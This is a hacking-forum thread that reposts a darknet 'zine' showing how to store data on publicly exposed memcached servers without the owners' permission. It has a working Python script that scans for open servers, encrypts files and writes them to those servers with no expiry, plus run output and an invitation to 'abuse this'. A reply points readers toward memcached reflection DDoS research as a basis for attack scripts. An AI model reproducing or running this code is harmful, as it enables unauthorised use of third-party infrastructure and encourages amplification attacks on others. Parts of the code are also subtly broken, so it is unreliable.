Zine: Exploiting Public Memcached Servers for free decentralized encrypted storage
#1
Zine: Exploiting Public Memcached Servers for free decentralized encrypted storage

This is a zine I found on the darknet not too long ago. No credits to me, I did not write this.

Credits: the Legion of WarezLoaders
http://warezlrg54cefgmp.onion/tgol/zines...torage.txt

Code [Expanded]:

[~Legion of WarezLoaders~]
█     █░ ▄▄▄       ██▀███  ▓█████ ▒███████▒ ██▓     ▒█████   ▄▄▄      ▓█████▄ ▓█████  ██▀███  
▓█░ █ ░█░▒████▄    ▓██ ▒ ██▒▓█   ▀ ▒ ▒ ▒ ▄▀░▓██▒    ▒██▒  ██▒▒████▄    ▒██▀ ██▌▓█   ▀ ▓██ ▒ ██▒
▒█░ █ ░█ ▒██  ▀█▄  ▓██ ░▄█ ▒▒███   ░ ▒ ▄▀▒░ ▒██░    ▒██░  ██▒▒██  ▀█▄  ░██   █▌▒███   ▓██ ░▄█ ▒
░█░ █ ░█ ░██▄▄▄▄██ ▒██▀▀█▄  ▒▓█  ▄   ▄▀▒   ░▒██░    ▒██   ██░░██▄▄▄▄██ ░▓█▄   ▌▒▓█  ▄ ▒██▀▀█▄  
░░██▒██▓  ▓█   ▓██▒░██▓ ▒██▒░▒████▒▒███████▒░██████▒░ ████▓▒░ ▓█   ▓██▒░▒████▓ ░▒████▒░██▓ ▒██▒
░ ▓░▒ ▒   ▒▒   ▓▒█░░ ▒▓ ░▒▓░░░ ▒░ ░░▒▒ ▓░▒░▒░ ▒░▓  ░░ ▒░▒░▒░  ▒▒   ▓▒█░ ▒▒▓  ▒ ░░ ▒░ ░░ ▒▓ ░▒▓░
 ▒ ░ ░    ▒   ▒▒ ░  ░▒ ░ ▒░ ░ ░  ░░░▒ ▒ ░ ▒░ ░ ▒  ░  ░ ▒ ▒░   ▒   ▒▒ ░ ░ ▒  ▒  ░ ░  ░  ░▒ ░ ▒░
 ░   ░    ░   ▒     ░░   ░    ░   ░ ░ ░ ░ ░  ░ ░   ░ ░ ░ ▒    ░   ▒    ░ ░  ░    ░     ░░   ░
   ░          ░  ░   ░        ░  ░  ░ ░        ░  ░    ░ ░        ░  ░   ░       ░  ░   ░    
                                  ░                                    ░                      

a cached memory zine


In this zine The Legion of WarezLoaders takes advantage of public db's and creates a decentralized encrypted backup system.


What is this? decentralization storage without a ethereum erc20 token? yes you actually can code without using the blockchain in 2018.

keybased db they get more and more popular for each day they run crypto currencies and other various backends.

We decided to target the db/storage memecached due to its lack of default security.
implementing something like this without using a firewall or similar is just like saying "Hey Legion of WarezLoaders! Come in!" and we are coming Smile


We actually looked into memecached for inspiration for temporary storing various things  while WL was created but we went with not using the code structure they use and went with creating our own for encryption and permanently deleting the data that is being cached.


Memcached is what:
Memcached is an in-memory key-value store for small chunks of arbitrary data (strings, objects) from results of database calls, API calls, or page rendering. according to -> https://www.memcached.org/, More : https://en.wikipedia.org/wiki/Memcached
memecached is also not overly exploited like various other protocols/services so a fun protocol to play with.

Quote:port: 11211
active: over 85k

Good  2 know:
storing values larger then 1MB requires special settings so lets safe-card and not do that
it runs in memory == reboot and ur data is gone, restart the service and its gone etc etc..
"Forgetting is a Feature" https://github.com/memcached/memcached/wiki/Overview
useful stuff: https://github.com/memcached/memcached/b...otocol.txt


Choose a language:
Python2.7 - simple, easy 2 write and we basically just need to index the boxes and create sockets


Create:
index alot of memcached servers that use port 11211(verify ur servers by telneting/netcating in and running "stats" to get a valid response so that we dont have any non-memcached sys) -> code a the client that encrypts and uploads the file  

[0]scan

after some scanning we where able to detect how much data we can use using regexing and some scripting we where shocked by the result we got

Quote:# python find_amount.py
Collected file storage volym:239807960768784.878748  MB  


that is an insane amount of storage just waiting to be used

we are talking 239807.96 Petabytes of unused storage

in this script we just read what STAT limit_maxbytes is set to on all systems


[1]Warez client
We gotta store em warez right?

Overview:
memecached got a simple api using tcp socket just store the data using the 'set' and get the data with 'get' and throw in some '\r\n'.
a good thing to keep in mind is that this is a great way to store temporary files and not
ur one copy of the backup, however we do disable the limit on all files so all files should be saved until the memcached daemon is rebooted/reloaded

we also want some crypto which is gonna make our data bigger unless we use a stream cipher but lets go with scrypt and split the data up between different servers.

we want a list of servers that run memecached in a .txt file so that we can randomly select one to use


code:
Code:
--Start--

import random, scrypt, sys, os
import socket, re

port = 11211

th3file = open('boxes.txt').read().split()
print len(th3file), ' amount of servers'
myfile = sys.argv[1]
socketn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

print 'picking out some random server'
random.shuffle(th3file)
tempsys = th3file[len(th3file)/2:]

print 'Give me a passwd so i can encrypt the file'
mypass = raw_input('Password: ')

print 'encrypting file'
cryptic = scrypt.encrypt(open(myfile, 'rb').read(), mypass, maxtime=1.0).encode('base64').replace('\n', '')
print 'file has been encrypted'

def decrypt_file(passwd,data):#just throwing in this function for ease of use
return scypt.decrypt(data, passwd, maxtime=1.0)

def send_the_data(boxkey, data, server):
socketn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socketn.settimeout(10)
try:
socketn.connect((server, port))
wareztext = 'set {} 1 0 {}\r\n{}\r\n'.format(boxkey, len(data), data) #by defining 0 we dont wont it to be removed(no time limit), we could use it as a "temporary anonymous saving system" by setting an expire time either in seconds or in good old unix
socketn.sendall(wareztext)
responsedata = socketn.recv(2048)
socketn.close()
return responsedata
except Exception:
print 'could not connect to: ', server
return True

def get_the_data(boxkey, server):#for later
socketn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socketn.connect((server, port))
wareztext = 'get {} \r\n'.format(boxkey)
socketn.sendall(wareztext)
responsedata = socketn.recv(2048)
socketn.close()
if 'VALUE' in responsedata:
regexmagic = 'VALUE\s{}.*\r\n(.*)\r\n'.format(boxkey)
responsedata = re.findall(regexmagic, responsedata)[0]#\\
return responsedata

def check_out(server):#for later
try:
socketn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socketn.connect((server , 11211))
socketn.sendall('stats\r\n')
reply = socketn.recv(2048)
mb = re.findall(r'STAT\slimit_maxbytes\s(.*)\r', reply)[0]
socketn.close()
except Exception:
return ('cant connect..', 0)
return (reply, mb)

slice1 = cryptic[len(cryptic)/2:]
slice0 = cryptic[:len(cryptic)/2]

print 'data has been sliced into 2 parts'
print 'uploading the data'
for serv in tempsys:
randkey0 = os.urandom(37).encode('base64').replace('\n', '').replace('=', '')
randkey1 = os.urandom(37).encode('base64').replace('\n', '').replace('=', '')
print 'Remember  remember: ', (randkey0, randkey1, serv)
send_the_data(randkey0,slice0,serv)
send_the_data(randkey1,slice1,serv)
print 'both slices sent'

print 'data has been uploaded to ', len(tempsys), ' amount of servers'
--EOL--

[2]: run

Code:
#cat loot.txt |uniq | head -n8 > boxes.txt
#echo 'blabla' > test.txt
#python script.py test.txt


8 amount of servers                                                        
picking out some random server                                                
Give me a passwd so i can encrypt the file                                    
Password: testing..                                                                
encrypting file                                                              
file has been encrypted                                                      
data has been sliced into 2 parts                                            
uploading the data                                                            
Remember  remember :  ('UlN7uWLbOB3xKII4a1bi6ylzPgtyGE6dhddEaZTukjJ9sjMGaw', 'KF+HnJDnN5YHRKNoQUwQfUSmv8iR+TREQvjEjc4J7v9Gi2ET5g', 'dont.run.memecache.public')            
both slices sent  
Remember remember:  ('B081/TCL5DY8fFIdZ7SRXJp3HRcZW0UfabpJLreufDp67FMkHw', '+ZAPAnkTpz2w/Uo9bVxATWCMGNaMur1/3s5dcxh33wOxxkOh9Q', 'dont.run.memecache.public')            
both slices sent
Remember remember:  ('g6nakHYNcbv6N9R3I9snQVycZ7lZz+IT/I5+s/jopzV2z1pifQ', 'fngnM4/ffJSPrh3ZjZxOCBkB9mBCVYrOr6Lj4e27cZIHKC2SZQ', 'dont.run.memecache.public')            
both slices sent                                                              
Remember remember:  ('ep2koPWKCmEh5Ow7+ZiJ4GLSyGpL8ilQk0jNShfszN049UqJmQ', '4Ld1hXYjuBfTduo8R3IeaQoWTC1BhTnK+nus20KRfAvn7pVhpA', 'dont.run.memecache.public')  
both slices sent
data has been uploaded to 4 amount of servers

[3]: abuse this and create ur own stuff

*/
CopyLeft the Legion of WarezLoaders

This zine must be distrubted.
This zine must be pirated.
This zine is not allowed to be sold.

Any use of this zine that is not illegal is not permitted.

By using this code and ezine in any sort of way.
You agree to that Katherine Forrest is
responsible for all warranty and misuse of this zine.

/*


~Warezloader the one and only real marketplace

http://warezlrg54cefgmp.onion/tgol/zines...torage.txt
Reply
#2
Here is an interesting document from security researchers on the current trend of using Memcached for reflected UDP attacks. http://powerofcommunity.net/poc2017/shengbao.pdf I bet you could figure out how to make scripts with this and the thread above.

Just thought I'd put it out there.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Need help exploiting CVE-2010-4345 using exim4_string_format on a virtual server 3thos 2 5,029 05-30-2022, 04:58 AM
Last Post: phoebefu69
  [Public Project] Dictionary attack program idea x86Cow 4 8,058 12-19-2021, 07:15 AM
Last Post: baka1024
  Torum: Freedom = free information nismo 0 10,269 03-31-2019, 12:00 PM
Last Post: nismo
  Free Mobile Data?? Lewis 1 10,325 03-10-2019, 06:28 AM
Last Post: MuddyBucket